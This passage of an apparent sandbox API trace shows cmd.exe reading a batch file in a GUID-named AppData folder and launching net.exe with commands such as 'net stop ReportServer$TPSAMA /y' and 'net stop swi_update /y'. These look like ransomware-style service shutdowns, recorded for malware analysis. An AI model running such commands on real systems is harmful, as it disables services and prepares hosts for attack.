fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0046.506] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0046.506] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0046.506] GetLastError () returned 0x2 [0046.506] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0046.506] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0046.507] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0046.507] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0046.507] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0046.507] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0046.507] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0046.507] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop ReportServer$TPSAMA /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop ReportServer$TPSAMA /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop ReportServer$TPSAMA /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0x954, dwThreadId=0x92c)) returned 1 [0046.511] CloseHandle (hObject=0x78) returned 1 [0046.511] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0046.511] GetProcessHeap () returned 0x3e0000 [0046.511] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0046.511] GetEnvironmentStringsW () returned 0x3f8408* [0046.511] GetProcessHeap () returned 0x3e0000 [0046.511] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0046.511] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0046.511] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0046.836] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0046.836] CloseHandle (hObject=0x74) returned 1 [0046.836] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0046.836] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0046.836] GetProcessHeap () returned 0x3e0000 [0046.836] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0046.836] GetEnvironmentStringsW () returned 0x3f8408* [0046.836] GetProcessHeap () returned 0x3e0000 [0046.836] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0046.836] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0046.836] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0046.836] GetProcessHeap () returned 0x3e0000 [0046.836] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0046.836] GetEnvironmentStringsW () returned 0x3f8408* [0046.836] GetProcessHeap () returned 0x3e0000 [0046.836] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0046.836] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0046.836] GetProcessHeap () returned 0x3e0000 [0046.836] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0046.837] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0046.837] _get_osfhandle (_FileHandle=1) returned 0x264 [0046.837] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0046.837] _get_osfhandle (_FileHandle=1) returned 0x264 [0046.837] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0046.837] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0046.837] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0046.837] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0046.837] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0046.837] SetConsoleInputExeNameW () returned 0x1 [0046.837] GetConsoleOutputCP () returned 0x1b5 [0046.838] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0046.838] SetThreadUILanguage (LangId=0x0) returned 0x409 [0046.838] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0046.838] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0046.838] _get_osfhandle (_FileHandle=3) returned 0x74 [0046.838] SetFilePointer (in: hFile=0x74, lDistanceToMove=2037, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7f5 [0046.838] GetProcessHeap () returned 0x3e0000 [0046.838] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0046.838] GetProcessHeap () returned 0x3e0000 [0046.838] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0046.838] GetProcessHeap () returned 0x3e0000 [0046.838] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0046.838] GetProcessHeap () returned 0x3e0000 [0046.838] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0046.838] GetProcessHeap () returned 0x3e0000 [0046.838] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0046.838] GetProcessHeap () returned 0x3e0000 [0046.838] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0046.838] GetProcessHeap () returned 0x3e0000 [0046.838] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0046.838] GetProcessHeap () returned 0x3e0000 [0046.838] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0046.838] GetProcessHeap () returned 0x3e0000 [0046.838] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0046.838] GetProcessHeap () returned 0x3e0000 [0046.838] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0046.838] GetProcessHeap () returned 0x3e0000 [0046.838] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0046.838] GetProcessHeap () returned 0x3e0000 [0046.838] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0046.838] GetProcessHeap () returned 0x3e0000 [0046.839] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0046.839] _get_osfhandle (_FileHandle=3) returned 0x74 [0046.839] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7f5 [0046.839] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x10cc, lpOverlapped=0x0) returned 1 [0046.839] SetFilePointer (in: hFile=0x74, lDistanceToMove=2061, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x80d [0046.839] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=24, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop swi_update /y\r\nSAMA /y\r\ny\r\n /y\r\ny\r\nΓÇ¥ /y\r\nlures\r\nnded\r\n") returned 24 [0046.839] _get_osfhandle (_FileHandle=3) returned 0x74 [0046.839] GetFileType (hFile=0x74) returned 0x1 [0046.839] _get_osfhandle (_FileHandle=3) returned 0x74 [0046.839] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x80d [0046.839] GetProcessHeap () returned 0x3e0000 [0046.839] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0046.839] GetProcessHeap () returned 0x3e0000 [0046.839] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0046.840] _tell (_FileHandle=3) returned 2061 [0046.840] _close (_FileHandle=3) returned 0 [0046.840] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0046.840] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0046.840] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0046.840] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0046.840] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0046.840] _wcsicmp (_String1="net", _String2="CD") returned 11 [0046.840] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0046.840] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0046.840] _wcsicmp (_String1="net", _String2="REN") returned -4 [0046.840] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0046.840] _wcsicmp (_String1="net", _String2="SET") returned -5 [0046.840] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0046.840] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0046.840] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0046.840] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0046.840] _wcsicmp (_String1="net", _String2="MD") returned 1 [0046.840] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0046.840] _wcsicmp (_String1="net", _String2="RD") returned -4 [0046.840] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0046.840] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0046.840] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0046.840] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0046.840] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0046.840] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0046.841] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0046.841] _wcsicmp (_String1="net", _String2="VER") returned -8 [0046.841] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0046.841] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0046.841] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0046.841] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0046.841] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0046.841] _wcsicmp (_String1="net", _String2="START") returned -5 [0046.841] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0046.841] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0046.841] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0046.841] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0046.841] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0046.841] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0046.841] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0046.841] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0046.841] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0046.841] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0046.841] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0046.841] SetErrorMode (uMode=0x0) returned 0x1 [0046.841] GetProcessHeap () returned 0x3e0000 [0046.841] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0046.841] GetProcessHeap () returned 0x3e0000 [0046.841] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0046.841] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0046.841] GetProcessHeap () returned 0x3e0000 [0046.841] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0046.841] GetProcessHeap () returned 0x3e0000 [0046.841] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0046.841] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0046.841] GetProcessHeap () returned 0x3e0000 [0046.841] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0046.841] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0046.842] GetProcessHeap () returned 0x3e0000 [0046.842] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0046.842] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0046.842] GetProcessHeap () returned 0x3e0000 [0046.842] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0046.842] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0046.842] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0046.842] GetLastError () returned 0x2 [0046.842] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0046.842] GetLastError () returned 0x2 [0046.842] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0046.842] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0046.842] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0046.842] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0046.842] GetLastError () returned 0x2 [0046.843] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0046.843] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0046.843] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0046.843] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0046.843] SetErrorMode (uMode=0x0) returned 0x1 [0046.843] GetProcessHeap () returned 0x3e0000 [0046.843] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0046.843] GetProcessHeap () returned 0x3e0000 [0046.843] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0046.843] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0046.843] GetProcessHeap () returned 0x3e0000 [0046.843] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0046.843] GetProcessHeap () returned 0x3e0000 [0046.843] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0046.843] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0046.843] GetProcessHeap () returned 0x3e0000 [0046.843] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0046.843] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0046.843] GetProcessHeap () returned 0x3e0000 [0046.843] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0046.843] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0046.843] GetProcessHeap () returned 0x3e0000 [0046.843] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0046.844] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0046.844] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0046.844] GetLastError () returned 0x2 [0046.844] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0046.844] GetLastError () returned 0x2 [0046.844] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0046.844] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3ff0 [0046.844] FindClose (in: hFindFile=0x3f3ff0 | out: hFindFile=0x3f3ff0) returned 1 [0046.844] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0046.844] GetLastError () returned 0x2 [0046.844] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3ff0 [0046.844] FindClose (in: hFindFile=0x3f3ff0 | out: hFindFile=0x3f3ff0) returned 1 [0046.845] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0046.845] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0046.845] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0046.845] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0046.845] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0046.845] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop swi_update /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop swi_update /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop swi_update /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0x928, dwThreadId=0x920)) returned 1 [0046.849] CloseHandle (hObject=0x74) returned 1 [0046.849] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0046.849] GetProcessHeap () returned 0x3e0000 [0046.849] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0046.849] GetEnvironmentStringsW () returned 0x3f8408* [0046.849] GetProcessHeap () returned 0x3e0000 [0046.849] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0046.849] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0046.849] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0047.136] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0047.136] CloseHandle (hObject=0x78) returned 1 [0047.136] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0047.136] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0047.136] GetProcessHeap () returned 0x3e0000 [0047.136] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0047.137] GetEnvironmentStringsW () returned 0x3f8408* [0047.137] GetProcessHeap () returned 0x3e0000 [0047.137] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0047.137] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0047.137] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0047.137] GetProcessHeap () returned 0x3e0000 [0047.137] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0047.137] GetEnvironmentStringsW () returned 0x3f8408* [0047.137] GetProcessHeap () returned 0x3e0000 [0047.137] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0047.137] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0047.137] GetProcessHeap () returned 0x3e0000 [0047.137] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0047.137] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0047.137] _get_osfhandle (_FileHandle=1) returned 0x264 [0047.137] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0047.137] _get_osfhandle (_FileHandle=1) returned 0x264 [0047.137] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0047.137] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0047.137] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0047.138] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0047.138] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0047.138] SetConsoleInputExeNameW () returned 0x1 [0047.138] GetConsoleOutputCP () returned 0x1b5 [0047.138] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0047.138] SetThreadUILanguage (LangId=0x0) returned 0x409 [0047.138] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0047.138] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0047.138] _get_osfhandle (_FileHandle=3) returned 0x78 [0047.138] SetFilePointer (in: hFile=0x78, lDistanceToMove=2061, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x80d [0047.138] GetProcessHeap () returned 0x3e0000 [0047.138] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0047.139] GetProcessHeap () returned 